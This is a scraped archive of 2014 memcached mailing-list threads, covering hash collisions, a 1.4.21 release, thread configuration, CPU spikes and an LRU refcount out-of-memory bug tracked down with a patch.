The hash table buckets are chained. By default memcached autoresizes the hash table as the number of items grows, so bucket collision is relatively rare. In recent versions you can also switch the internal hash algorithm between jenkins and murmur if you want to test. On Sun, 19 Oct 2014, Deepak S wrote: Hi all, this is my first mail to this awesome group.What is the collision resolution mechanism used in memcached hash table? Thanks -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
memcached 1.4.21
Is out: https://code.google.com/p/memcached/wiki/ReleaseNotes1421 - targeted release just for the OOM issues reported by Box + some misc fixes. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: items not able to be memcached and not logging
No idea, sorry :/ On Thu, 2 Oct 2014, Sheel Shah wrote: Understood. Do you know where I can find a supported windows version of the memcached exe? The most recent one I was able to find was version 1.4.4. Thanks, Sheel -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: items not able to be memcached and not logging
Hey, Sorry but that version is well over 5 years old, and a forked windows port at that. It's unsupported. On Wed, 1 Oct 2014, Sheel Shah wrote: I believe the version number on our current memcached EXE is 1.2.6. The error I see in my independent log is the following: Item could not be cached with memcached: item name Type: System.Data.DataTable, In process Cache Duration: 02:00:00 I intentionally left the item name out of the reply, but the items are not all the same, and are of different types. Thanks, Sheel -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: items not able to be memcached and not logging
What version of memcached are you running (the server, not the client). What is the exact error you're seeing in the logs? On Tue, 30 Sep 2014, Sheel Shah wrote: Hello, I apologize for the vagueness of this post, as I am new to using and supporting memcached. For the last couple of months, we have seen a large number of errors where items could not be cached through Memcached. To troubleshoot the issue, we are attempting to enable logging that we found on this URL https://github.com/enyim/EnyimMemcached/wiki/Configure-Logging We attempted to enable the diagnostic logging as well as the Log4Net logging. And while we are seeing errors in another log file which shows that the items could not be memcached, we are unable to see anything in the diagnostic logs that could explain why the items are failing. I'm fairly certain it's not a permissions problem, as I allowed the app pool identity full access to the subfolder as well as the log file, and the read-only attribute on the file/folder is not checked. Has anyone else had a similar issue or can point me in the right direction? Thanks, Sheel Shah -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: change os'date Memcached stats time While being changed
Recent versions use a monotonic clock, so changing the system clock can't cause memcached to lose its mind. Why are you trying to do this on purpose? On Tue, 16 Sep 2014, Yu Liu wrote: Today I found memcached cat not be work。 so , I found memcached stats time while being changed before os date change。 EXP-1 : Centos 6.5 64bit Memcache Version: 1.4.7 # date Tue Sep 16 09:56:43 CST 2014 # telnet 10.11.1.15 11211 Trying 10.11.1.15... Connected to 10.11.1.15 (10.11.1.15). Escape character is '^]'. stats STAT pid 2923 STAT uptime 9 STAT time 1410850931 STAT version 1.4.7 change date # date Fri Jul 26 00:00:00 CST 2013 # telnet 10.11.1.15 11211 Trying 10.11.1.15... Connected to 10.11.1.15 (10.11.1.15). Escape character is '^]'. stats stats STAT pid 2923 STAT uptime 4258884380 STAT time 5669735302 STAT version 1.4.7 however upgrade memcache to 1.4.20 Centos 6.5 64bit Memcache Version: 1.4.20 #stats STAT pid 2586 STAT uptime 8 STAT time 1410838280 STAT version 1.4.20 STAT libevent 1.4.13-stable change date stats STAT pid 2586 STAT uptime 55 STAT time 1410838327 STAT version 1.4.20 Now, this time can not be changed. what's the matter ? I did not find the answer in http://code.google.com/p/memcached/wiki/ReleaseNotes 。 -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: Remove certain items from the cache
Why would another client get the wrong data if the original data was successfully uploaded? I don't understand the use case, and it's not possible either way. On Wed, 3 Sep 2014, Xingui Shi wrote: what i meant is the data is successfully uploaded, but the client restart for some reason. the data stored in memcache server need to be flushed. or other client my get the wrong data. 在 2014年9月3日星期三UTC+8下午3时04分59秒,Dormando写道: If a client is uploading something and it does not complete the upload, the data will be dropped. Otherwise, no. On Wed, 3 Sep 2014, Xingui Shi wrote: Hi, Is there any way to drop data add by a client when the client aborted or exit normally? thanks. 在 2014年8月12日星期二UTC+8上午10时25分43秒,Dormando写道: Hello there, There he has a method to be able to remove items from the cache using a regular expression on the key. For example we want to remove all the key as my_key_ *? We try to parse all the slabs with the command stats cachedump but our slabs contain several pages and it is impossible to recover all the elements! Thank you. Hi, The common way to do this, instantly, and atomically across your entire memcached cluster is via namespacing: http://code.google.com/p/memcached/wiki/NewProgrammingTricks#Namespacing You take a tradeoff: before I look up my key, I fetch a side key which contains the current prefix. Then I add that prefix to my normal key and do the lookup. When you want to invalidate all keys with the same prefix, you incr or otherwise update the prefix. The old keys will fall out of the LRU and your clients will no longer access them. This is *much* more efficient than any wrangling around with scanning and parsing keys. That only gets worse as you get a larger cluster, while namespacing stays at a consistent speed. Does this match what you're looking for, or did you have some specific requirements? If so, please give more detail for your problem. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: tail repair issue (1.4.20)
Thanks so much for sticking around and testing! I have a number of bugs to go over as I mentioned before, so it may take a little longer to bake this into a release. I still want to add a cap on how much churn it allows, so for 10,000 items you might instead get a handful of OOM's. This is to deal with extreme cases regardless. Again, thanks. It's been really hard to get people to stick around for this; first we had to fix the crash caused by items sitting in the LRU, then it became apparent why they were there and we could fix that issue. I'm happy to understand this. On Tue, 26 Aug 2014, Jay Grizzard wrote: Okay, so, we did some testing! I deployed a test build last Thursday and let it run with no further changes, graphing the ‘reflocked’ counter (which is the metric I added for ‘refcounted so moved to other end of LRU’). The graph for that ends up looking like this: http://i.imgur.com/0CZfHWf.png Basically a spike on restart (which makes sense, there’s probably a few fast-expiring or deleted entries on the tail almost immediately), and then occasional spikes over time. More spikes than I actually *expected*, but none are particularly large, and I’d completely believe that we had ‘legitimate’ locking of items in there, too. So I consider that completely helpful. (The graph is total across all slabs, and peaks at 8/sec, and only briefly, so… yeah, healthy.) The other thing I did yesterday was to intentionally lock a bunch of items to see what the behavior looked like. I picked a slab that was relatively high churn (max item age ~6000) and had no reflocks at all. Created 10k items and locked them. The reflocked graph for that looks like this: http://i.imgur.com/oghSU3o.png Basically, one big spike every couple of hours (with the interval decreasing as traffic increases). You can’t see it from the graph, but the reflocked counter increments by exactly 10,000 for each spike, while the outofmemory counter stays at zero. This is exactly what I expected to happen, which is awesome. We’ve otherwise been really stable with the patch, so I think I’m fairly comfortable saying the patch you provided is a reasonable solution to the problem. I’d even be satisfied without adding anything else to limit number of moves to 5 in a go, since the odds of that being an issue in just about any situation seem … low. But if you can add it cleanly, go for it! :) Let me know when you have a final patch (which would presumably be a release candidate for 1.4.21) and I’ll be happy to verify that as well, and then we can officially declare this bug dead and have a little party, since I totally think finally finding this thing is deserving of a party… ;) -j On Thu, Aug 21, 2014 at 12:33 PM, dormando dorma...@rydia.net wrote: Okay cool. As I mentioned with the original link I will be adding some sort of sanity checking to break the loop. I just have to reorganize the whole thing and ran out of time (I got stuck for a while because unlink was wiping search-prev and it kept bailing the loop :P) I need someone to try it to see if it's the right approach first, then the rest is doable. It's just tricky code and requires some care. Thanks for putting some effort into this. I really appreciate it! On Thu, 21 Aug 2014, Jay Grizzard wrote: Hi, sorry about the slow response. Naturally, the daily problem we were having stopped as soon as you checked in that patch. Typical, eh? Anyhow, I’ve studied the patch and it seems to be pretty good — the only worry I have is that if you end up with the extremely degenerate case of an entire LRU being refcounted, you have to walk the entire LRU before returning ‘out of memory’. I’m not thinking that this is a big problem (because if you have a few tens of thousands of items, that’s pretty quick… and if you have millions… well, why do you have millions of items refcounted?), but worth at least noting. I was going to suggest a change to make it fit into the ‘tries’ loop better so those moves got counted as a try, but there doesn’t seem to be a particularly clean way to do that, so I’m willing to just accept it as a limitation that might get hit in situations far worse than the one that’s causing us issues right now. I’m okay with that. I haven’t tried the patch under production load yet, because I wanted to have stats to give us some information about what was going on under the hood. I finally got a chance to add in an additional stat for refcounted items on the tail — I sent you a PR with that patch (https://github.com/dormando/memcached/pull/1). I *think* I got the right things in the right places, though you may take issue with the stat name (“reflocked”). Now that I have the stats, I’m going to work on putting
Re: tail repair issue (1.4.20)
Okay cool. As I mentioned with the original link I will be adding some sort of sanity checking to break the loop. I just have to reorganize the whole thing and ran out of time (I got stuck for a while because unlink was wiping search-prev and it kept bailing the loop :P) I need someone to try it to see if it's the right approach first, then the rest is doable. It's just tricky code and requires some care. Thanks for putting some effort into this. I really appreciate it! On Thu, 21 Aug 2014, Jay Grizzard wrote: Hi, sorry about the slow response. Naturally, the daily problem we were having stopped as soon as you checked in that patch. Typical, eh? Anyhow, I’ve studied the patch and it seems to be pretty good — the only worry I have is that if you end up with the extremely degenerate case of an entire LRU being refcounted, you have to walk the entire LRU before returning ‘out of memory’. I’m not thinking that this is a big problem (because if you have a few tens of thousands of items, that’s pretty quick… and if you have millions… well, why do you have millions of items refcounted?), but worth at least noting. I was going to suggest a change to make it fit into the ‘tries’ loop better so those moves got counted as a try, but there doesn’t seem to be a particularly clean way to do that, so I’m willing to just accept it as a limitation that might get hit in situations far worse than the one that’s causing us issues right now. I’m okay with that. I haven’t tried the patch under production load yet, because I wanted to have stats to give us some information about what was going on under the hood. I finally got a chance to add in an additional stat for refcounted items on the tail — I sent you a PR with that patch (https://github.com/dormando/memcached/pull/1). I *think* I got the right things in the right places, though you may take issue with the stat name (“reflocked”). Now that I have the stats, I’m going to work on putting a patched copy out under production load to make sure it holds up there, and at least see about artificially generating one of the hung-get situations that was causing us problems. I’ll let you know how that works out! -j On Mon, Aug 11, 2014 at 8:54 PM, dormando dorma...@rydia.net wrote: Well, sounds like whatever process was asking for that data is dead (and possibly pissing off a customer) so you should indeed figure out what that's about. Yeah, we’ll definitely hunt this one down. I’ll have to toss up a monitor to look for things in a write state for extended periods and then go do some tracing (rather than, say, waiting for it to actually break again). We *do* have some legitimately long-running (multi-hour) things going on, so can’t just say “long connection bad!”, but it would be nice if maybe those processes could slurp their entire response upfront or some such. I think another thing we can do is actually throw a refcounted-for-a-long-time item back to the front of the LRU. I'll try a patch for that this weekend. It should have no real overhead compared to other approaches of timing out connections. Is there any reason you can’t do “if refcount 1 when walking the end of the tail, send to the front” without requiring ‘refcounted for a long time’ (with, of course, still limiting it to 5ish actions)? It seems like this would be pretty safe, since generally stuff at the end of LRU shouldn’t have a refcount, and then you don’t need extra code for figuring out how long something has been refcounted. I guess there’s a slightly degenerate case in there, which is that if you have a small slab that’s 100% refcounted, you end up cycling a bunch of pointers every write just to run the LRU in a big circle and never write anything (similar to the case you suggest in your last paragraph), but that’s a situation I’m totally willing to accept. ;) Anyhow, looking forward to a patch, and will gladly help test! Here, try out this branch: https://github.com/dormando/memcached/tree/refchuck It needs some cleanup and sanity checking. I want to redo the loop instead of the weird goto, add an arg to item_update intead of copypasta, and add one or two sanity checks to break the loop if you're trying to alloc out of a class that's 100% reflocked. I added a test that works okay. Fails before, runs after. Can you try this on one or two machines and see what the impact is? If it works okay I'll clean it up and merge. Need to spend a little more time on the PR queue before I can cut though. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails
Re: tail repair issue (1.4.20)
Apparently I lied about the weekend, sorry... On Mon, 11 Aug 2014, Jay Grizzard wrote: Well, sounds like whatever process was asking for that data is dead (and possibly pissing off a customer) so you should indeed figure out what that's about. Yeah, we’ll definitely hunt this one down. I’ll have to toss up a monitor to look for things in a write state for extended periods and then go do some tracing (rather than, say, waiting for it to actually break again). We *do* have some legitimately long-running (multi-hour) things going on, so can’t just say “long connection bad!”, but it would be nice if maybe those processes could slurp their entire response upfront or some such. Good luck! I think another thing we can do is actually throw a refcounted-for-a-long-time item back to the front of the LRU. I'll try a patch for that this weekend. It should have no real overhead compared to other approaches of timing out connections. Is there any reason you can’t do “if refcount 1 when walking the end of the tail, send to the front” without requiring ‘refcounted for a long time’ (with, of course, still limiting it to 5ish actions)? It seems like this would be pretty safe, since generally stuff at the end of LRU shouldn’t have a refcount, and then you don’t need extra code for figuring out how long something has been refcounted. I guess there’s a slightly degenerate case in there, which is that if you have a small slab that’s 100% refcounted, you end up cycling a bunch of pointers every write just to run the LRU in a big circle and never write anything (similar to the case you suggest in your last paragraph), but that’s a situation I’m totally willing to accept. ;) Anyhow, looking forward to a patch, and will gladly help test! Thanks! I'm going back and forth on it honestly. I think it should only move it if it's been at least UPDATE_INTERVAL since it last moved it, possibly UPDATE_INTERVAL * 4. Given your case of I have a bajillion objects ref'ed by this one connection, and the fact that the allocator only walks five up in the history before giving up, I have two main options: 1) throw the bottom 5 to the top, then give up (and do that for each allocation forever, which can slow down all writes by holding the central cache lock for longer). That'll still cause a number of OOM's while it tries to clear your 9,00 ref'ed objects from the bottom (yeah I know it's only 3200ish) 2) If refcounted + last_update now + UPDATE_INTERVAL*N - flip to top and don't count that as a try. This will cause memcached to have a very brief hiccup when it lands on the pile of objects, but won't cause an OOM and won't flip around forever. It also avoids a pathological regression if someone hammers a slab class stuck in this state (and path #1 was chosen). If you have teeny slab classes you're likely to be screwed either way, so the extra time interval doesn't hurt you much more than you would anyway. I assume/hope objects that you've been fetching take more than a couple minutes to hit the bottom of the slab class. If they do, your evictions are probably nutters and hit rate crap anyway; you'd need more ram. So yeah. leaning toward #2? Different definition of refcounted for a long time compare to what tail_repairs defaulted to. Much shorter. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: Remove certain items from the cache
Hello there, There he has a method to be able to remove items from the cache using a regular expression on the key. For example we want to remove all the key as my_key_ *? We try to parse all the slabs with the command stats cachedump but our slabs contain several pages and it is impossible to recover all the elements! Thank you. Hi, The common way to do this, instantly, and atomically across your entire memcached cluster is via namespacing: http://code.google.com/p/memcached/wiki/NewProgrammingTricks#Namespacing You take a tradeoff: before I look up my key, I fetch a side key which contains the current prefix. Then I add that prefix to my normal key and do the lookup. When you want to invalidate all keys with the same prefix, you incr or otherwise update the prefix. The old keys will fall out of the LRU and your clients will no longer access them. This is *much* more efficient than any wrangling around with scanning and parsing keys. That only gets worse as you get a larger cluster, while namespacing stays at a consistent speed. Does this match what you're looking for, or did you have some specific requirements? If so, please give more detail for your problem. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: tail repair issue (1.4.20)
Well, sounds like whatever process was asking for that data is dead (and possibly pissing off a customer) so you should indeed figure out what that's about. Yeah, we’ll definitely hunt this one down. I’ll have to toss up a monitor to look for things in a write state for extended periods and then go do some tracing (rather than, say, waiting for it to actually break again). We *do* have some legitimately long-running (multi-hour) things going on, so can’t just say “long connection bad!”, but it would be nice if maybe those processes could slurp their entire response upfront or some such. I think another thing we can do is actually throw a refcounted-for-a-long-time item back to the front of the LRU. I'll try a patch for that this weekend. It should have no real overhead compared to other approaches of timing out connections. Is there any reason you can’t do “if refcount 1 when walking the end of the tail, send to the front” without requiring ‘refcounted for a long time’ (with, of course, still limiting it to 5ish actions)? It seems like this would be pretty safe, since generally stuff at the end of LRU shouldn’t have a refcount, and then you don’t need extra code for figuring out how long something has been refcounted. I guess there’s a slightly degenerate case in there, which is that if you have a small slab that’s 100% refcounted, you end up cycling a bunch of pointers every write just to run the LRU in a big circle and never write anything (similar to the case you suggest in your last paragraph), but that’s a situation I’m totally willing to accept. ;) Anyhow, looking forward to a patch, and will gladly help test! Here, try out this branch: https://github.com/dormando/memcached/tree/refchuck It needs some cleanup and sanity checking. I want to redo the loop instead of the weird goto, add an arg to item_update intead of copypasta, and add one or two sanity checks to break the loop if you're trying to alloc out of a class that's 100% reflocked. I added a test that works okay. Fails before, runs after. Can you try this on one or two machines and see what the impact is? If it works okay I'll clean it up and merge. Need to spend a little more time on the PR queue before I can cut though. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: tail repair issue (1.4.20)
Thanks! It might take me a while to look into it more closely. That conn_mwrite is probably bad, however a single connection shouldn't be able to do it. Before the OOM is given up, memcached walks up the chain from the bottom of the LRU by 5ish. So all of them have to be locked, or possibly some thing I'm unaware of. Great that you have some cores. Can you look at the tail of the LRU for the slab which was OOM'ing, and print the item struct there? If possible, walk up 5-10 items back from the tail and print each (anonymized, of course). It'd be useful to see the refcount and flags on the items. Have you tried re-enabling tailrepairs on one of your .20 instances? It could still crash sometimes, but you can set the timeout to a reasonably low number and see if that helps at all while we figure this out. On Thu, 7 Aug 2014, Jay Grizzard wrote: (I work with Denis, who is out of town this week) So we finally got a more proper 1.4.20 deployment going, and we’ve seen this issue quite a lot over the past week. When it happened this morning I was able to grab what you requested. I’ve included a couple of “stats conn” dumps, with anonymized addresses, taken four minutes apart. It looks like there’s one connection that could possibly be hung: STAT 2089:state conn_mwrite …would that be enough to cause this problem? (I’m assuming the answer is “it depends”) I snagged a core file from the process that I should be able to muck through to answer questions if there’s somewhere in there we would find useful information. Worth noting that while we’ve been able to reproduce the hang (a single slab starts reporting oom for every write), we haven’t reproduced the “but recovers on its own” part because these are production servers and the problem actually causes real issues, so we restart them rather than waiting several hours to see if the problem clears up. Also, reading up in the thread, it’s worth noting that lack of TCP keepalives (which we actually have, memcached enables it) wouldn’t actually affect the “and automatically recover” aspect of things, because TCP keepalives only happen when a connection is completely idle. When there’s pending data (which there would be on a hung write), standard TCP timeouts (which are much faster) apply. (And yes, we do have lots of idle connections to our caches, but that’s not something we can immediately fix, nor should it directly be the cause of these issues.) Anyhow… thoughts? -j -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: Memcached instance and thread configuration parameters
Please upgrade. If you have problems with the latest version we can look into it more. You can also look at command counters for odd commands being given: make sure nobody's running flushes, or stats sizes, or stats cachedump since those can cause CPU spikes and hangs. With 1.4.20 you can use stats conns to see what the connections are doing during the cpu spike. On Thu, 7 Aug 2014, Claudio Santana wrote: Forgot to say I'm running version 1.4.13 libevent 2.0.16-stable On Thu, Aug 7, 2014 at 6:08 PM, Claudio Santana claudio.sant...@gmail.com wrote: Sorry for the late response. My CPU utilization normally is min 2.5% to 6.5% max. So it's interesting you ask this. The reason why I submitted the 1st question is because I've experienced some random CPU utilization spikes. From this about 6% CPU utilization all of the sudden it spikes to 100% and I can see the offending process is one of the Memcached instances. Sadly this CPU spike is accompanied by all requests timing out causing the whole system to become unusable. I collect minute by minute stats of all these memcached instances and according to my stats this issue happens within 2 minutes. I can see in the number of commands there's no increase in number of commands being issued right before the CPU spike nor increase in the number of bytes in/out. Does anybody have any ideas of what could be going on? I have all Memcached stats collected by minute in Graphite, I can provide other stats that could help explain this issue if necessary. On Mon, Aug 4, 2014 at 9:36 PM, dormando dorma...@rydia.net wrote: You could run one instance with one thread and serve all of that just fine. have you actually looked at graphs of the CPU usage of the host? memcached should be practically idle with load that low. One with -t 6 or -t 8 would do it just fine. On Mon, 4 Aug 2014, Claudio Santana wrote: Dormando, thanks for the quick response. Sorry for the confusion, I don't have exact metrics per second but per minute 1.12 million sets and 1.8 million gets which translates to 18,666 sets per minute and 30,000 gets per second. These stats are per Memcached instance which I currently run 3 on each server. Claudio. On Mon, Aug 4, 2014 at 6:22 PM, dormando dorma...@rydia.net wrote: On Mon, 4 Aug 2014, Claudio Santana wrote: I have this Memcached cluster where 3 instances of Memcached run in a single server. These servers have 24 cores, each instance is configured to have 8 threads each. Each individual instance serves have about 5000G gets/sets a day and about 3k current connections. I don't know what 5000G gets/sets a day translates to in per-second (nor what the G-unit even is?), can you define this? What would be better? consolidate these 3 instances to a single instance per server with 24 threads? I've read in a few articles that Memcached's performance starts suffering with more than 4-6 threads per instance, is this generally true? How about keeping the 3 instances per server and decreasing the number of threads to say 4 or 6? or creating 4 instances in the same servers instead of 3 and decreasing the number of threads per instance to 6 so there is one thread per core. Is there a guide you could recommend to configure the right number of threads and strategies to get the most out of a Memcached server/instance? Thanks, Claudio -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google
Re: Memcached instance and thread configuration parameters
Those three stats commands aren't problematic. The others I listed are. Sadly there aren't stats counters for them, I think... Are you sure it's not completely crashing after the CPU spike? it actually recovers on its own? On Thu, 7 Aug 2014, Claudio Santana wrote: I run every minute stats, stats items and stats slabs. the only commands executed are remove, incr, add, get, set and cas. I'm running now with 6 threads per instance with 3 per server and haven't had the issue again, not that this change fixed it. I'll definitely update. On Aug 7, 2014 6:13 PM, dormando dorma...@rydia.net wrote: Please upgrade. If you have problems with the latest version we can look into it more. You can also look at command counters for odd commands being given: make sure nobody's running flushes, or stats sizes, or stats cachedump since those can cause CPU spikes and hangs. With 1.4.20 you can use stats conns to see what the connections are doing during the cpu spike. On Thu, 7 Aug 2014, Claudio Santana wrote: Forgot to say I'm running version 1.4.13 libevent 2.0.16-stable On Thu, Aug 7, 2014 at 6:08 PM, Claudio Santana claudio.sant...@gmail.com wrote: Sorry for the late response. My CPU utilization normally is min 2.5% to 6.5% max. So it's interesting you ask this. The reason why I submitted the 1st question is because I've experienced some random CPU utilization spikes. From this about 6% CPU utilization all of the sudden it spikes to 100% and I can see the offending process is one of the Memcached instances. Sadly this CPU spike is accompanied by all requests timing out causing the whole system to become unusable. I collect minute by minute stats of all these memcached instances and according to my stats this issue happens within 2 minutes. I can see in the number of commands there's no increase in number of commands being issued right before the CPU spike nor increase in the number of bytes in/out. Does anybody have any ideas of what could be going on? I have all Memcached stats collected by minute in Graphite, I can provide other stats that could help explain this issue if necessary. On Mon, Aug 4, 2014 at 9:36 PM, dormando dorma...@rydia.net wrote: You could run one instance with one thread and serve all of that just fine. have you actually looked at graphs of the CPU usage of the host? memcached should be practically idle with load that low. One with -t 6 or -t 8 would do it just fine. On Mon, 4 Aug 2014, Claudio Santana wrote: Dormando, thanks for the quick response. Sorry for the confusion, I don't have exact metrics per second but per minute 1.12 million sets and 1.8 million gets which translates to 18,666 sets per minute and 30,000 gets per second. These stats are per Memcached instance which I currently run 3 on each server. Claudio. On Mon, Aug 4, 2014 at 6:22 PM, dormando dorma...@rydia.net wrote: On Mon, 4 Aug 2014, Claudio Santana wrote: I have this Memcached cluster where 3 instances of Memcached run in a single server. These servers have 24 cores, each instance is configured to have 8 threads each. Each individual instance serves have about 5000G gets/sets a day and about 3k current connections. I don't know what 5000G gets/sets a day translates to in per-second (nor what the G-unit even is?), can you define this? What would be better? consolidate these 3 instances to a single instance per server with 24 threads? I've read in a few articles that Memcached's performance starts suffering with more than 4-6 threads per instance, is this generally true? How about keeping the 3 instances per server and decreasing the number of threads to say 4 or 6? or creating 4 instances in the same servers instead of 3 and decreasing the number of threads per instance to 6 so there is one thread per core. Is there a guide you could recommend to configure the right number of threads and strategies to get the most out of a Memcached server
Re: Memcached instance and thread configuration parameters
No command can take up much time. If all other commands hang up, it's either a long-running stats command like I listed before, or a hang bug (though I don't know why it would recover on its own). We've fixed a lot of those since .13, so I'd still advocate upgrading at least some instances to see if they become immune to it. On Thu, 7 Aug 2014, Claudio Santana wrote: I think this issue has something to do with our access pattern (although we run very limited commands and not very high traffic either). We always start having issues on the same instance (I guess because of the system accessing a specific key). When we notice the issue we bounce the instance within 15/20 mins, I don't know if you think this is not enough time to recover. Sometimes the issue moves to other instaces in other servers (our client doesn't rebalance so the system is trying to access completely different keys). On the other servers sometimes the issue goes away on its own or the spike is not at 100pct. On Aug 7, 2014 6:36 PM, dormando dorma...@rydia.net wrote: Those three stats commands aren't problematic. The others I listed are. Sadly there aren't stats counters for them, I think... Are you sure it's not completely crashing after the CPU spike? it actually recovers on its own? On Thu, 7 Aug 2014, Claudio Santana wrote: I run every minute stats, stats items and stats slabs. the only commands executed are remove, incr, add, get, set and cas. I'm running now with 6 threads per instance with 3 per server and haven't had the issue again, not that this change fixed it. I'll definitely update. On Aug 7, 2014 6:13 PM, dormando dorma...@rydia.net wrote: Please upgrade. If you have problems with the latest version we can look into it more. You can also look at command counters for odd commands being given: make sure nobody's running flushes, or stats sizes, or stats cachedump since those can cause CPU spikes and hangs. With 1.4.20 you can use stats conns to see what the connections are doing during the cpu spike. On Thu, 7 Aug 2014, Claudio Santana wrote: Forgot to say I'm running version 1.4.13 libevent 2.0.16-stable On Thu, Aug 7, 2014 at 6:08 PM, Claudio Santana claudio.sant...@gmail.com wrote: Sorry for the late response. My CPU utilization normally is min 2.5% to 6.5% max. So it's interesting you ask this. The reason why I submitted the 1st question is because I've experienced some random CPU utilization spikes. From this about 6% CPU utilization all of the sudden it spikes to 100% and I can see the offending process is one of the Memcached instances. Sadly this CPU spike is accompanied by all requests timing out causing the whole system to become unusable. I collect minute by minute stats of all these memcached instances and according to my stats this issue happens within 2 minutes. I can see in the number of commands there's no increase in number of commands being issued right before the CPU spike nor increase in the number of bytes in/out. Does anybody have any ideas of what could be going on? I have all Memcached stats collected by minute in Graphite, I can provide other stats that could help explain this issue if necessary. On Mon, Aug 4, 2014 at 9:36 PM, dormando dorma...@rydia.net wrote: You could run one instance with one thread and serve all of that just fine. have you actually looked at graphs of the CPU usage of the host? memcached should be practically idle with load that low. One with -t 6 or -t 8 would do it just fine. On Mon, 4 Aug 2014, Claudio Santana wrote: Dormando, thanks for the quick response. Sorry for the confusion, I don't have exact metrics per second but per minute 1.12 million sets and 1.8 million gets which translates to 18,666 sets per minute and 30,000 gets per second. These stats are per Memcached instance which I currently run 3 on each server. Claudio
Re: Export Control Classification Number (ECCN) of memcached 1.4
I have no idea what you're talking about. On Wed, 6 Aug 2014, skt8u...@gmail.com wrote: Dear All, I'm developing a system using memcached 1.4 and I'll release it to the other country (Italy). Could you please give me, the US Export Control Classification Number (ECCN) of memcached 1.4 ? I understand that there is no ECCN for Open Source software basically. Could you please confirm that ? Thanks for your answer. Best regards, Tommy -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: Memcached instance and thread configuration parameters
